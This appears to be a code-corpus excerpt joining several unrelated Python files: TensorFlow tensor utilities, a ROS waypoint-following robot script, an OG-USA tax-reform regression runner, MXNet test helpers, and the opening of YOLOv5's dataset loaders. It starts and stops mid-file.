return nce, auc
def GatherTensorValuesBySeqIndices(tensor, class_indices, keepdims=False):
"""Gather values from a 3d tensor according to sequences of indices.
Args:
tensor: a 3d tensor of [dim0, dim1, num_class], e.g. output from softmax.
class_indices: a 2d tensor of [dim0, dim1], where the second dim is a
sequence of class indices between 0 to num_class - 1, inclusive.
keepdims: bool, expand the last dimension of the returned tensor if True.
Returns:
A tensor ret of [dim0, dim1], where
ret[b, t] = tensor[b, t, indices[b, t]].
If keepdims is True, then ret has shape [dim0, dim1, 1].
"""
tensor = HasRank(tensor, 3)
class_indices = HasRank(class_indices, 2)
tensor = HasShape(tensor, GetShape(class_indices), 2)
dim0 = GetShape(class_indices)[0]
dim1 = GetShape(class_indices)[1]
dim0_indices = tf.tile(tf.expand_dims(tf.range(dim0), axis=-1), [1, dim1])
dim1_indices = tf.tile(tf.expand_dims(tf.range(dim1), axis=0), [dim0, 1])
gather_indices = tf.stack([
tf.cast(dim0_indices, dtype=class_indices.dtype),
tf.cast(dim1_indices, dtype=class_indices.dtype), class_indices
],
axis=-1)
ret = tf.gather_nd(tensor, gather_indices)
if keepdims:
ret = tf.expand_dims(ret, axis=-1)
return ret
def GetSoftmaxProbsBySeqIndices(logits, indices, keepdims=False):
"""Get softmax probabilities from index sequences given logits sequences.
Args:
logits: a tensor of [batch, time, num_class] or [time, batch, num_class].
indices: a tensor of [batch, time] or [time, batch].
keepdims: bool, expand the last dimension of the returned tensor if True.
Returns:
a tensor of [batch, time] or [time, batch] for the corresponding softmax
probabilities. If keepdims is True, returned tensor has a third dimension
of size 1.
"""
probs = tf.nn.softmax(logits)
return GatherTensorValuesBySeqIndices(probs, indices, keepdims)
def DivideNoNan(x, y):
"""Equivalent to tf.math.divide_no_nan but supports bfloat16."""
safe_y = tf.where(tf.equal(y, 0.), tf.ones_like(y), y)
return tf.where(tf.equal(y, 0.0), tf.zeros_like(x), x / safe_y)
def SequencePaddings(seqlen, maxlen=None):
mask = tf.sequence_mask(seqlen, maxlen, dtype=tf.float32)
return 1 - mask
def AppendDims(x, ndims):
return tf.reshape(x, GetShape(x) + [1] * ndims)
def MaybeSoftCapLogits(x, cap=0.0):
"""Caps logits x to be within a certain range.
Args:
x: A float tensor, the logit values to be capped.
cap: a float, the limit to cap x within. If cap <= 0.0, x is not capped.
Returns:
logits after capping.
"""
if cap <= 0.0:
return x
else:
return cap * tf.math.tanh(x / cap)
def GetTpuEmbeddingGraphCollection():
"""Return the graph collection that stores the TpuEmbeddingCollection."""
tpu_emb_graph_collection = tf.get_collection_ref('__tpu_embedding_collection')
assert len(tpu_emb_graph_collection) <= 1
return tpu_emb_graph_collection
class AuxLossContext:
"""Context that holds a list of aux-losses.
By default it is non-reentrant, but can be specified as reentrant explicitly
when creating an inner context.
"""
_global_stack = []
@classmethod
def Current(cls):
"""Returns current context or None."""
if cls._global_stack:
return cls._global_stack[-1]
else:
return None
def __init__(self, reentrant=False):
self.aux_loss_tensors = []
self._reentrant = reentrant
def AddLoss(self, loss):
self.aux_loss_tensors.append(loss)
@property
def aux_losses(self):
return self.aux_loss_tensors
def __enter__(self):
if not self._reentrant:
assert not self._global_stack, 'no re-entry'
self._global_stack.append(self)
return self
def __exit__(self, *args):
self._global_stack.pop()
def GetTrainableVariables(scope, bprop_variable_filter,
bprop_variable_exclusion, vmap):
"""Returns trainable vars.
Args:
scope: A Python str.
bprop_variable_filter: see BaseTask.Params().bprop_variable_filter.
bprop_variable_exclusion: see BaseTask.Params().bprop_variable_exclusion.
vmap: A NestedMap of var_path(str) -> tf Variable.
Returns:
A filtered NestedMap of var_path(str) -> trainable tf Variable.
"""
pos = re.compile(bprop_variable_filter) if bprop_variable_filter else None
neg = re.compile(
bprop_variable_exclusion) if bprop_variable_exclusion else None
def VariableFilter(v):
"""Returns True if variable v should be optimized by this learner."""
if not v.trainable:
return False
if pos and not pos.search(v.name):
tf.logging.info('%s: disabled by bprop_variable_filter: %s', scope,
v.name)
return False
if neg and neg.search(v.name):
tf.logging.info('%s: disabled by bprop_variable_exclusion: %s', scope,
v.name)
return False
return True
return vmap.Filter(VariableFilter)
|
follow_waypoints.py
|
#!/usr/bin/env python
import threading
import rospy
import actionlib
from smach import State,StateMachine
from april_docking.msg import DockingAction, DockingGoal
#from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
#from mbf_msgs.msg import MoveBaseAction, MoveBaseGoal
from geometry_msgs.msg import PoseWithCovarianceStamped, PoseArray
from actionlib_msgs.msg import GoalStatus
from std_msgs.msg import Empty
from tf import TransformListener
import tf
import math
import rospkg
import csv
import time
#Path for saving and retreiving the pose.csv file
output_file_path = rospkg.RosPack().get_path('follow_waypoints')+"/saved_path/pose.csv"
waypoints = []
class FollowPath(State):
def __init__(self):
State.__init__(self, outcomes=['success','failure'], input_keys=['waypoints'])
self.frame_id = rospy.get_param('~goal_frame_id','map')
self.odom_frame_id = rospy.get_param('~odom_frame_id','odom')
self.base_frame_id = rospy.get_param('~base_frame_id','base_footprint')
self.duration = rospy.get_param('~wait_duration', 0.0)
self.move_base_type = rospy.get_param('~move_base_type','move_base')
self.move_base_ns = rospy.get_param('~move_base_ns','move_base')
# Get a move_base action client
if self.move_base_type == 'move_base':
from move_base_msgs.msg import MoveBaseAction
elif self.move_base_type == 'move_base_flex':
from mbf_msgs.msg import MoveBaseAction
self.client = actionlib.SimpleActionClient(self.move_base_ns, MoveBaseAction)
self.client_dock = actionlib.SimpleActionClient('docking', DockingAction)
rospy.loginfo('Connecting to move_base...')
self.client.wait_for_server()
rospy.loginfo('Connected to move_base.')
rospy.loginfo('Starting a tf listner.')
self.tf = TransformListener()
self.listener = tf.TransformListener()
self.distance_tolerance = rospy.get_param('~waypoint_distance_tolerance', 0.0)
rospy.loginfo(self.frame_id + ',' + str(self.duration) + ',' + str(self.distance_tolerance))
def execute(self, userdata):
global waypoints
# Execute waypoints each in sequence
for wp_type, waypoint in waypoints:
# Break if preempted
if waypoints == []:
rospy.loginfo('The waypoint queue has been reset.')
break
# Otherwise publish next waypoint as goal
if wp_type == "pose":
if self.move_base_type == 'move_base':
from move_base_msgs.msg import MoveBaseGoal
elif self.move_base_type == 'move_base_flex':
from mbf_msgs.msg import MoveBaseGoal
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = self.frame_id
goal.target_pose.pose.position = waypoint.pose.pose.position
goal.target_pose.pose.orientation = waypoint.pose.pose.orientation
rospy.loginfo('Executing move_base goal to position (x,y): %s, %s' %
(waypoint.pose.pose.position.x, waypoint.pose.pose.position.y))
rospy.loginfo("To cancel the goal: 'rostopic pub -1 /move_base/cancel actionlib_msgs/GoalID -- {}'")
self.client.send_goal(goal)
if not self.distance_tolerance > 0.0:
while not self.client.wait_for_result(rospy.Duration(30.0)):
self.client.send_goal(goal)
result = self.client.get_state()
if result == GoalStatus.SUCCEEDED:
rospy.loginfo("Waiting for %f sec..." % self.duration)
time.sleep(self.duration)
else:
rospy.loginfo("Reported to fail to reach the waypoint")
return 'failure'
else:
#This is the loop which exist when the robot is near a certain GOAL point.
distance = float("inf")
while(distance > self.distance_tolerance):
if self.client.wait_for_result(rospy.Duration(0.1)):
result = self.client.get_state()
if result == GoalStatus.SUCCEEDED:
now = rospy.Time.now()
self.listener.waitForTransform(self.frame_id, self.base_frame_id, now, rospy.Duration(4.0))
trans,rot = self.listener.lookupTransform(self.frame_id,self.base_frame_id, now)
distance = math.sqrt(pow(waypoint.pose.pose.position.x-trans[0],2)+pow(waypoint.pose.pose.position.y-trans[1],2))
if distance > self.distance_tolerance:
rospy.loginfo("Claim to reach the waypoint but fail the tolerance test. Resending waypoint...")
self.client.send_goal(goal)
else:
rospy.loginfo("Reported to reach the waypoint")
break
else:
rospy.loginfo("Reported to fail to reach the waypoint")
return 'failure'
else:
now = rospy.Time.now()
self.listener.waitForTransform(self.frame_id, self.base_frame_id, now, rospy.Duration(4.0))
trans,rot = self.listener.lookupTransform(self.frame_id,self.base_frame_id, now)
distance = math.sqrt(pow(waypoint.pose.pose.position.x-trans[0],2)+pow(waypoint.pose.pose.position.y-trans[1],2))
elif wp_type == "dock":
goal = DockingGoal()
goal.goalId = waypoint
self.client_dock.send_goal(goal)
self.client_dock.wait_for_result()
result = self.client_dock.get_state()
if result == GoalStatus.SUCCEEDED:
rospy.loginfo("Wait for %f seconds..." % 4.0)
time.sleep(4.0)
else:
rospy.loginfo("Reported to fail to dock")
return 'failure'
return 'success'
def convert_PoseWithCovArray_to_PoseArray(waypoints):
"""Used to publish waypoints as pose array so that you can see them in rviz, etc."""
poses = PoseArray()
poses.header.frame_id = rospy.get_param('~goal_frame_id','map')
poses.poses = [pose.pose.pose for wp_type, pose in waypoints if wp_type == "pose"]
return poses
class GetPath(State):
def __init__(self):
State.__init__(self, outcomes=['success'], input_keys=['waypoints'], output_keys=['waypoints'])
# Create publsher to publish waypoints as pose array so that you can see them in rviz, etc.
self.poseArray_publisher = rospy.Publisher('/waypoints', PoseArray, queue_size=1)
# Start thread to listen for reset messages to clear the waypoint queue
def wait_for_path_reset():
"""thread worker function"""
global waypoints
while not rospy.is_shutdown():
data = rospy.wait_for_message('/path_reset', Empty)
rospy.loginfo('Recieved path RESET message')
self.initialize_path_queue()
rospy.sleep(3) # Wait 3 seconds because `rostopic echo` latches
# for three seconds and wait_for_message() in a
# loop will see it again.
reset_thread = threading.Thread(target=wait_for_path_reset)
reset_thread.start()
def initialize_path_queue(self):
global waypoints
waypoints = [] # the waypoint queue
# publish empty waypoint queue as pose array so that you can see them the change in rviz, etc.
self.poseArray_publisher.publish(convert_PoseWithCovArray_to_PoseArray(waypoints))
def execute(self, userdata):
global waypoints
self.initialize_path_queue()
self.path_ready = False
# Start thread to listen for when the path is ready (this function will end then)
# Also will save the clicked path to pose.csv file
def wait_for_path_ready():
"""thread worker function"""
data = rospy.wait_for_message('/path_ready', Empty)
rospy.loginfo('Recieved path READY message')
self.path_ready = True
with open(output_file_path, 'w') as file:
for wp_type, current_pose in waypoints:
if wp_type == "pose":
file.write(str(current_pose.pose.pose.position.x) + ',' + str(current_pose.pose.pose.position.y) + ',' + str(current_pose.pose.pose.position.z) + ',' + str(current_pose.pose.pose.orientation.x) + ',' + str(current_pose.pose.pose.orientation.y) + ',' + str(current_pose.pose.pose.orientation.z) + ',' + str(current_pose.pose.pose.orientation.w)+ '\n')
rospy.loginfo('poses written to '+ output_file_path)
ready_thread = threading.Thread(target=wait_for_path_ready)
ready_thread.start()
self.start_journey_bool = False
# Start thread to listen start_jorney
# for loading the saved poses from follow_waypoints/saved_path/poses.csv
def wait_for_start_journey():
"""thread worker function"""
data_from_start_journey = rospy.wait_for_message('start_journey', Empty)
rospy.loginfo('Recieved path READY start_journey')
global waypoints
waypoints = []
with open(output_file_path, 'r') as file:
reader = csv.reader(file, delimiter = ',')
for row in reader:
print(row)
if len(row) == 7:
current_pose = PoseWithCovarianceStamped()
current_pose.pose.pose.position.x = float(row[0])
current_pose.pose.pose.position.y = float(row[1])
current_pose.pose.pose.position.z = float(row[2])
current_pose.pose.pose.orientation.x = float(row[3])
current_pose.pose.pose.orientation.y = float(row[4])
current_pose.pose.pose.orientation.z = float(row[5])
current_pose.pose.pose.orientation.w = float(row[6])
waypoints.append(("pose", current_pose))
elif len(row) == 1:
waypoints.append(("dock", row[0]))
self.poseArray_publisher.publish(convert_PoseWithCovArray_to_PoseArray(waypoints))
self.start_journey_bool = True
start_journey_thread = threading.Thread(target=wait_for_start_journey)
start_journey_thread.start()
topic = "/initialpose"
rospy.loginfo("Waiting to recieve waypoints via Pose msg on topic %s" % topic)
rospy.loginfo("To start following waypoints: 'rostopic pub /path_ready std_msgs/Empty -1'")
rospy.loginfo("OR")
rospy.loginfo("To start following saved waypoints: 'rostopic pub /start_journey std_msgs/Empty -1'")
# Wait for published waypoints or saved path loaded
while (not self.path_ready and not self.start_journey_bool):
try:
pose = rospy.wait_for_message(topic, PoseWithCovarianceStamped, timeout=1)
except rospy.ROSException as e:
if 'timeout exceeded' in e.message:
continue # no new waypoint within timeout, looping...
else:
raise e
rospy.loginfo("Recieved new waypoint")
waypoints.append(("pose", pose))
# publish waypoint queue as pose array so that you can see them in rviz, etc.
self.poseArray_publisher.publish(convert_PoseWithCovArray_to_PoseArray(waypoints))
# Path is ready! return success and move on to the next state (FOLLOW_PATH)
return 'success'
class PathComplete(State):
def __init__(self):
State.__init__(self, outcomes=['success'])
def execute(self, userdata):
rospy.loginfo('###############################')
rospy.loginfo('##### REACHED FINISH GATE #####')
rospy.loginfo('###############################')
return 'success'
def main():
rospy.init_node('follow_waypoints')
sm = StateMachine(outcomes=['success'])
with sm:
StateMachine.add('GET_PATH', GetPath(),
transitions={'success':'FOLLOW_PATH'},
remapping={'waypoints':'waypoints'})
StateMachine.add('FOLLOW_PATH', FollowPath(),
transitions={'success':'PATH_COMPLETE', 'failure':'PATH_COMPLETE'},
remapping={'waypoints':'waypoints'})
StateMachine.add('PATH_COMPLETE', PathComplete(),
transitions={'success':'GET_PATH'})
outcome = sm.execute()
|
run_reforms.py
|
#!/usr/bin/env python
'''
'''
from __future__ import print_function
try:
import traceback
from multiprocessing import Process
import argparse
import json
import os
from pprint import pformat
import sys
import time
import uuid
sys.path.append("../")
import matplotlib
matplotlib.use('Agg')
import pandas as pd
import ogusa
from ogusa import SS
from ogusa import TPI
from ogusa.scripts import postprocess
from ogusa.scripts.execute import runner # change here for small jobs
from ogusa.utils import REFORM_DIR, BASELINE_DIR
except Exception as e:
pref = sys.prefix
exc = traceback.format_exc()
raise ValueError("Failed on sys.prefix {} on imports with {} - {}".format(pref, repr(e), exc))
#from execute_small import runner
VERSION = "0.5.5"
QUICK_RUN = False
REFORM_SPEC_HELP = '''Over time, code renaming and API changes have
required what was "reforms.json" to change
formats in order to continue expecting the same
results in regression testing. new_reforms.json was
added on Oct 10, 2016 for this reason and is
now the default reform-spec'''
_d = os.path.dirname
REGRESSION_CONFIG_FILE = os.path.join(_d(_d(os.path.abspath(__file__))), '.regression.txt')
REGRESSION_CONFIG = {}
for line in open(REGRESSION_CONFIG_FILE).readlines():
line = line.strip()
parts = tuple(p.strip() for p in line.split())
if len(parts) == 2:
k, v = parts
if k in ('diff', 'dry_run_imports_installs_only'):
v = v.lower() == 'true'
REGRESSION_CONFIG[k] = v
REQUIRED = set(('compare_taxcalc_version',
'compare_ogusa_version',
'install_taxcalc_version',
'diff',
'numpy_version',
'reform_specs_json'))
missing = [r for r in REQUIRED if not r in REGRESSION_CONFIG]
if missing:
raise ValueError('.regression.txt at top level of repo needs to define: {}'.format(missing))
def run_micro_macro(reform, user_params, guid, solution_checks, run_micro):
# Turn off checks for now
SS.ENFORCE_SOLUTION_CHECKS = solution_checks
TPI.ENFORCE_SOLUTION_CHECKS = solution_checks
start_time = time.time()
reform_dir = "./OUTPUT_REFORM" + guid
baseline_dir = "./OUTPUT_BASELINE" + guid
# Add start year from reform to user parameters
start_year = sorted(reform.keys())[0]
user_params['start_year'] = start_year
input_dir = baseline_dir
kwargs={'output_base':baseline_dir, 'baseline_dir':baseline_dir,
'baseline':True, 'analytical_mtrs':False, 'age_specific':False,
'user_params':user_params, 'guid':guid, 'run_micro':run_micro}
#p1 = Process(target=runner, kwargs=kwargs)
#p1.start()
runner(**kwargs)
kwargs={'output_base':reform_dir, 'baseline_dir':baseline_dir,
'baseline':False, 'analytical_mtrs':False, 'user_params':user_params,
'reform':reform, 'age_specific':False, 'guid':guid,'run_micro':run_micro}
#p2 = Process(target=runner, kwargs=kwargs)
#p2.start()
runner(**kwargs)
#p1.join()
#print("just joined")
#p2.join()
#time.sleep(0.5)
ans = postprocess.create_diff(baseline_dir=baseline_dir, policy_dir=reform_dir)
print("total time was ", (time.time() - start_time))
print(ans)
return ans
def make_args_from_regression_config():
parser = argparse.ArgumentParser(description='Take reform id, branch from command line and .regression.yml config from top level of repo')
parser.add_argument('reform', help='Reform such as "reform0", "reform1", "t1", or "t2"')
parser.add_argument('ogusabranch', help='Git branch to install')
args = argparse.Namespace(**REGRESSION_CONFIG)
args2 = parser.parse_args()
args.reform = args2.reform
args.install_ogusa_version = args2.ogusabranch
args.folder = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'standards',
'tc{}_og{}'.format(args.compare_taxcalc_version,
args.compare_ogusa_version))
if args.diff:
args.standard = os.path.join(args.folder, 'results_data_{}.csv'.format(args.reform))
if not os.path.exists(args.folder):
raise ValueError('Cannot diff against Tax-Calculator {} '
'and OG-USA {} because {} does not '
'exist'.format(args.compare_taxcalc_version,
args.compare_ogusa_version,
args.standard))
print('RUN_REFORMS WITH REGRESSION_CONFIG:\n\n{}'.format(pformat(vars(args))))
return args
def main():
args = make_args_from_regression_config()
if bool(getattr(args, 'dry_run_imports_installs_only', False)):
print("DRY_RUN_IMPORTS_INSTALLS_ONLY OK")
return
with open(args.reform_specs_json, "r") as f:
reforms = json.loads(f.read())
reform_num = args.reform
# Run the given reform
if QUICK_RUN:
guid = ''
solution_checks = False
run_micro = False
else:
guid = uuid.uuid1().hex
solution_checks = True
run_micro = True
reform = {int(k):v for k,v in reforms[reform_num].items()}
ans = run_micro_macro(reform=reform, user_params={}, guid=guid,
solution_checks=solution_checks,
run_micro=run_micro)
as_percent = ans * 100
# Dump a "pretty print" version of the answer provided to the web app
cols = list(map(str, range(2016, 2026))) + ["2016-2025"] + ["Steady State"]
rows = ["GDP", "Consumption", "Investment", "Hours Worked", "Wages",
"Interest Rates", "Total Taxes"]
df = pd.DataFrame(data=ans, columns=cols, index=rows)
pd.options.display.float_format = '{:12,.3f}'.format
with open("results_pprint_{}.txt".format(reform_num), 'w') as h:
h.write(df.__repr__())
# Dump the actual data
df.to_csv("results_data_{}.csv".format(reform_num))
if args.diff:
df_released = pd.read_csv(args.standard, index_col=0)
df_diff = df_released - df
# Dump the diff data
fname = "diff_{0}_tc{1}_og{2}_to_master.csv".format(args.reform, args.compare_taxcalc_version, args.compare_ogusa_version)
df_diff.to_csv(fname)
print("END")
if __name__ == "__main__":
main()
|
common.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sys, os, logging, functools
import multiprocessing as mp
import mxnet as mx
import numpy as np
import random
import shutil
from mxnet.base import MXNetError
from mxnet.test_utils import environment
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.append(os.path.join(curr_path, '../common/'))
sys.path.insert(0, os.path.join(curr_path, '../../../python'))
import models
from contextlib import contextmanager
import pytest
from tempfile import TemporaryDirectory
import locale
xfail_when_nonstandard_decimal_separator = pytest.mark.xfail(
locale.localeconv()["decimal_point"] != ".",
reason="Some operators break when the decimal separator is set to anything other than \".\". "
"These operators should be rewritten to utilize the new FFI. Please see #18097 for more "
"information."
)
def assertRaises(expected_exception, func, *args, **kwargs):
try:
func(*args, **kwargs)
except expected_exception as e:
pass
else:
# Did not raise exception
assert False, "%s did not raise %s" % (func.__name__, expected_exception.__name__)
def default_logger():
"""A logger used to output seed information to logs."""
logger = logging.getLogger(__name__)
# getLogger() lookups will return the same logger, but only add the handler once.
if not len(logger.handlers):
handler = logging.StreamHandler(sys.stderr)
handler.setFormatter(logging.Formatter('[%(levelname)s] %(message)s'))
logger.addHandler(handler)
if (logger.getEffectiveLevel() == logging.NOTSET):
logger.setLevel(logging.INFO)
return logger
@contextmanager
def random_seed(seed=None):
"""
Runs a code block with a new seed for np, mx and python's random.
Parameters
----------
seed : the seed to pass to np.random, mx.random and python's random.
To impose rng determinism, invoke e.g. as in:
with random_seed(1234):
...
To impose rng non-determinism, invoke as in:
with random_seed():
...
Upon conclusion of the block, the rng's are returned to
a state that is a function of their pre-block state, so
any prior non-determinism is preserved.
"""
try:
next_seed = np.random.randint(0, np.iinfo(np.int32).max)
if seed is None:
np.random.seed()
seed = np.random.randint(0, np.iinfo(np.int32).max)
logger = default_logger()
logger.debug('Setting np, mx and python random seeds = %s', seed)
np.random.seed(seed)
mx.random.seed(seed)
random.seed(seed)
yield
finally:
# Reinstate prior state of np.random and other generators
np.random.seed(next_seed)
mx.random.seed(next_seed)
random.seed(next_seed)
def _assert_raise_cuxx_version_not_satisfied(min_version, cfg):
def less_than(version_left, version_right):
"""Compares two version strings in the format num(.[num])*"""
if not version_left or not version_right:
return False
left = version_left.split(".")
right = version_right.split(".")
# 0 pad shortest version - e.g.
# less_than("9.1", "9.1.9") == less_than("9.1.0", "9.1.9")
longest = max(len(left), len(right))
left.extend([0] * (longest - len(left)))
right.extend([0] * (longest - len(right)))
# compare each of the version components
for l, r in zip(left, right):
if l == r:
continue
return int(l) < int(r)
return False
def test_helper(orig_test):
@functools.wraps(orig_test)
def test_new(*args, **kwargs):
cuxx_off = os.getenv(cfg['TEST_OFF_ENV_VAR']) == 'true'
cuxx_env_version = os.getenv(cfg['VERSION_ENV_VAR'], None if cuxx_off else cfg['DEFAULT_VERSION'])
cuxx_test_disabled = cuxx_off or less_than(cuxx_env_version, min_version)
if not cuxx_test_disabled or mx.device.current_device().device_type == 'cpu':
orig_test(*args, **kwargs)
else:
pytest.raises((MXNetError, RuntimeError), orig_test, *args, **kwargs)
return test_new
return test_helper
def assert_raises_cudnn_not_satisfied(min_version):
return _assert_raise_cuxx_version_not_satisfied(min_version, {
'TEST_OFF_ENV_VAR': 'CUDNN_OFF_TEST_ONLY',
'VERSION_ENV_VAR': 'CUDNN_VERSION',
'DEFAULT_VERSION': '7.3.1'
})
def assert_raises_cuda_not_satisfied(min_version):
return _assert_raise_cuxx_version_not_satisfied(min_version, {
'TEST_OFF_ENV_VAR': 'CUDA_OFF_TEST_ONLY',
'VERSION_ENV_VAR': 'CUDA_VERSION',
'DEFAULT_VERSION': '10.1'
})
def with_environment(*args_):
"""
Helper function that takes a dictionary of environment variables and their
desired settings and changes the environment in advance of running the
decorated code. The original environment state is reinstated afterwards,
even if exceptions are raised.
"""
def test_helper(orig_test):
@functools.wraps(orig_test)
def test_new(*args, **kwargs):
with environment(*args_):
orig_test(*args, **kwargs)
return test_new
return test_helper
def run_in_spawned_process(func, env, *args):
"""
Helper function to run a test in its own process.
Avoids issues with Singleton- or otherwise-cached environment variable lookups in the backend.
Adds a seed as first arg to propagate determinism.
Parameters
----------
func : function to run in a spawned process.
env : dict of additional environment values to set temporarily in the environment before exec.
args : args to pass to the function.
Returns
-------
Whether the python version supports running the function as a spawned process.
This routine calculates a random seed and passes it into the test as a first argument. If the
test uses random values, it should include an outer 'with random_seed(seed):'. If the
test needs to return values to the caller, consider use of shared variable arguments.
"""
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
return False
else:
seed = np.random.randint(0,1024*1024*1024)
with environment(env):
# Prepend seed as first arg
p = mpctx.Process(target=func, args=(seed,)+args)
p.start()
p.join()
assert p.exitcode == 0, "Non-zero exit code %d from %s()." % (p.exitcode, func.__name__)
return True
def retry(n):
"""Retry n times before failing for stochastic test cases."""
# TODO(szha): replace with flaky
# https://github.com/apache/incubator-mxnet/issues/17803
assert n > 0
def test_helper(orig_test):
@functools.wraps(orig_test)
def test_new(*args, **kwargs):
"""Wrapper for tests function."""
for i in range(n):
try:
orig_test(*args, **kwargs)
return
except AssertionError as e:
if i == n-1:
raise e
mx.nd.waitall()
return test_new
return test_helper
|
datasets.py
|
# Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.general import xyxy2xywh, xywh2xyxy, xywhn2xyxy, xyn2xy, segment2box, segments2boxes, resample_segments, \
clean_str
from utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640, stride=32):
p = str(Path(path).absolute()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
# print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')
# print(' ')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
# print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
